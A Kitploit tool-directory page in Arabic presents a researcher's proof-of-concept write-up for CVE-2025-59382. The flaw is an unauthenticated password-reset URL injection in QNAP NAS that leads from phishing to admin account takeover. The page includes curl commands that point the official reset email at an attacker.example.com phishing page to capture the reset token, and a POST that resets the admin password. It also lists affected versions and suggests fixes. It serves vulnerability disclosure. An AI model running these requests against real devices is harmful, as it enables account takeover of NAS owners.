Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/rat5ak/cve-2025-59382-qnap-password-reset-account-takeover
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتصيد الاحتيالياختبار الاختراقالتعلم والتعليم
GitHubrat5ak/cve-2025-59382-qnap-password-reset-account-takeover

CVE-2025-59382-QNAP-Password-Reset-Account-Takeover

إثبات المفهوم والكتابة الفنية لـ CVE-2025-59382، ثغرة حقن رابط إعادة تعيين كلمة المرور غير موثقة في QNAP NAS تتيح سلسلة من التصيد إلى الاستيلاء على الحساب.

عرض المستودع
1116منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-59382: إعادة تعيين كلمة مرور QNAP إلى الاستيلاء على الحساب

عنوان URL لإعادة تعيين كلمة المرور يتحكم به مهاجم غير مصدق في /cgi-bin/reset_password.cgi.

تم اختباره ضد QuTScloud c5.2.4.3041 build 20250211 في مختبر. نشرت QNAP هذا لاحقًا باسم CVE-2025-59382 في نشرة QSA-26-10.

النسخة المختصرة

يمكن لمهاجم غير مصدق لديه وصول إلى الشبكة المحلية، أو وصول إلى واجهة إدارة NAS مكشوفة، حقن عنوان URL عشوائي في البريد الإلكتروني الرسمي لإعادة تعيين كلمة مرور QNAP عن طريق التلاعب بمعامل url في وظيفة send_mail في /cgi-bin/reset_password.cgi.

يتلقى الضحية بريدًا إلكترونيًا حقيقيًا لإعادة تعيين كلمة مرور QNAP من NAS. يتم تضمين عنوان URL الخاص بالمهاجم مباشرة في نص البريد الإلكتروني HTML، وتقوم QNAP بإلحاق رمز إعادة التعيين (rp) بهذا العنوان.

وهذا يحول البريد الإلكتروني لإعادة تعيين كلمة المرور إلى سلسلة تصيد إلى الاستيلاء على الحساب نظيفة وجيدة:

  1. يقوم المهاجم بتشغيل إعادة تعيين كلمة المرور باستخدام عنوان URL الخاص به
  2. يرسل NAS البريد الإلكتروني الحقيقي لإعادة تعيين كلمة مرور QNAP إلى الضحية
  3. ينقر الضحية على عنوان URL الخاص بالمهاجم
  4. يتلقى المهاجم رمز إعادة التعيين rp
  5. يدخل الضحية رمز التحقق (vc) في صفحة التصيد
  6. يقوم المهاجم بإعادة تعيين كلمة مرور المسؤول وتسجيل الدخول

يتطلب تفاعل الضحية، ولكن لا يحتاج إلى مصادقة المهاجم.

التشغيل

curl "http://<NAS_IP>:8080/cgi-bin/reset_password.cgi?func=send_mail&user=admin&url=https://attacker.example.com/phish"

يقوم NAS بإرسال البريد الإلكتروني الرسمي لإعادة التعيين ويلحق رمز إعادة التعيين بعنوان URL الخاص بالمهاجم، على سبيل المثال:

https://attacker.example.com/phish&u=admin&rp=e15a88a01fa81e58352b4b157607cb44

يظهر رمز التحقق أيضًا في نفس البريد الإلكتروني. في الأدلة المخبرية بدا كالتالي:

Your verification code is: 2FEA2B8B

لذلك، على صفحة التصيد فقط أن تطلب من الضحية رمز التحقق. رمز rp يصل بالفعل إلى خادم المهاجم عند النقر على الرابط.

إعادة تعيين كلمة المرور

بمجرد أن يحصل المهاجم على رمز rp ورمز التحقق vc المرتبط به، يمكنه إعادة تعيين كلمة مرور المسؤول:

curl -X POST -d "func=reset_user_pw&user=admin&token=e15a88a01fa81e58352b4b157607cb44&vc=725E0F00&new_pw=UHduZWQyMDI2IQ==" \
  "http://<NAS_IP>:8080/cgi-bin/reset_password.cgi"

يجب أن يكون طلب إعادة التعيين النهائي POST. يتم إرسال رمز التحقق الذي يدخله الضحية في الصفحة المزيفة إلى QNAP كـ vc=<code>.

كلمة المرور الجديدة مشفرة بـ base64 في new_pw. في إثبات المفهوم، كان هذا كافيًا لتغيير كلمة مرور المسؤول ثم تسجيل الدخول كمسؤول.

لماذا يعمل

تبني الواجهة الأمامية العادية عنوان URL محلي لـ NAS مثل:

location.protocol + "//" + location.host + "/cgi-bin/main.html?cp=1"

لكن النهاية الخلفية تثق بمعامل url الذي يوفره العميل بدلاً من إنشاء عنوان URL لإعادة التعيين بنفسها. ثم تقوم ببناء رابط البريد الإلكتروني باستخدام تلك القيمة وتلحق:

&u=<user>&rp=<reset_token>
>

إنها تثق بكل ما يتم تمريره كـ `url`.

## التأثير

- تشغيل بريد إلكتروني لإعادة التعيين بدون مصادقة
- البريد الإلكتروني الرسمي لـ QNAP يحتوي على عنوان URL يتحكم به المهاجم
- تسرب رمز إعادة التعيين إلى المهاجم عند نقر الضحية
- يمكن التصيد لرمز التحقق من نفس تدفق البريد الإلكتروني
- أثبتت السلسلة المخبرية إمكانية إعادة تعيين كلمة مرور المسؤول وتسجيل الدخول كمسؤول

البريد الإلكتروني الموثوق لـ NAS هو الذي يقوم بالتسليم.

## الحالة العامة

- CVE: `CVE-2025-59382`
- النشرة: `QSA-26-10`
- تاريخ إصدار نشرة QNAP: `2026-06-17`
- CWE من البائع: `CWE-472`
- CVSS v4.0 من البائع: `5.1 متوسط`
- حالة QNAP: تم الحل

تسرد QNAP المنتجات المتأثرة كالتالي:

- QTS `5.2.7`
- QuTS hero `h5.2.8`
- QuTS cloud `c5.2.8`
- QVP `2.7.1`

الإصدارات المُصلحة المدرجة من قبل QNAP:

- QTS `5.2.9.3499`
- QuTS hero `h5.2.9`
- QuTS cloud `C5.2.9`
- QVP `2.8.0`

وصفت QNAP المشكلة كمهاجم عن بعد يقوم بتعديل عنوان URL لإعادة تعيين كلمة المرور وخداع ضحية لزيارة صفحة إعادة تعيين يتحكم بها المهاجم، مما يؤدي إلى سرقة بيانات الاعتماد.

كان هدفي المخبري هو QuTScloud `c5.2.4.3041 build 20250211`. كان التأثير المخبري هو إعادة تعيين كلمة مرور المسؤول وتسجيل الدخول كمسؤول بعد تفاعل الضحية.

ملاحظة صغيرة: قمت بإعادة إنتاج هذا في مختبري في `2026-05-09` وأرسلته إلى QNAP في `2026-05-11`؛ وقد وضعوا علامة عليه كمكرر لـ `INTSI000-9029`. نظرًا لأن QNAP نشرت الآن CVE/النشرة، فأنا أنشر إثبات المفهوم. يعود الفضل إلى Tim Coen كأول من اكتشف.

## ما الذي سأصلحه

لا أعرف التصحيح الدقيق الذي استخدمته QNAP. نشرتها تدرج فقط الإصدارات المُصلحة.

تخميني للإصلاح الصحيح بسيط: لا تدع المتصفح يخبر NAS إلى أين يجب أن يشير رابط إعادة التعيين.

يجب على NAS بناء هذا الرابط بنفسه. إذا كانت QNAP لا تزال بحاجة إلى معامل `url` للتدفق، فيجب أن يقبل فقط صفحة إعادة التعيين العادية لـ NAS ويرفض أي شيء خارجي.

سأقوم أيضًا بتشفير أي شيء يتم إدراجه في نص البريد الإلكتروني، ووضع بعض حدود المعدل حول طلبات البريد الإلكتروني لإعادة التعيين غير المصادق عليها.

## المراجع

- نشرة QNAP: https://www.qnap.com/en/security-advisory/qsa-26-10
- JSON CVE من QNAP: https://www.qnap.com/uploads/security-advisories/QSA-26-10/CVE-2025-59382.json
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-59382
- سجل CVE: https://www.cve.org/CVERecord?id=CVE-2025-59382

---

> **إخلاء مسؤولية:** تم نشر كود الاستغلال هذا لأغراض تعليمية وبحثية دفاعية. لا 
> تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. المؤلف غير 
> مسؤول عن سوء الاستخدام.

*Daniel Wade - [GitHub](https://github.com/Rat5ak) · [Twitter/X](https://x.com/Nadsec11) · [Bluesky](https://bsky.app/profile/nadsec.online) · [Mastodon](https://cyberplace.social/@Nadsec) · [Medium](https://medium.com/@Nadsec) · [nadsec.online](https://nadsec.online)*
تنزيل الأداة